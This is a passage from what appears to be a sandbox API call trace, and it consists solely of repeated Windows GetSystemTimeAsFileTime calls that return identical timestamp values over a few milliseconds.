lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.959] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.962] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.964] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] 